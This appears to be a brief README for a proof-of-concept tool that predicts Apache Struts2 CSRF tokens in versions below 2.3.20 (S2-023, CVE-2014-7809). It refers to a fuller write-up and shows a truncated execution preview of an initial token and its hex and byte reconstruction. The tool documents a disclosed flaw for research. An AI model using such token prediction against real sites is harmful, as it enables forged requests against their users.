Proof of concept code to predict Struts2 CSRF Token < 2.3.20
Proof of concept code to predict Struts CSRF token [S2-023]

For a complete explanation, you can read: Predicting Struts CSRF Token (CVE-2014-7809)

Execution preview:

    == Initial token
    H6P3Y3GHIC2865ASZVQ913NR93QZO7BR
    == Initial token in hex (easier evaluation)
    14b08fcbf6523eecd7dd7d3e89cf97d6f478db5617
    Guessing part
    == bytes representation (reconstructed byte array)
    14b08fc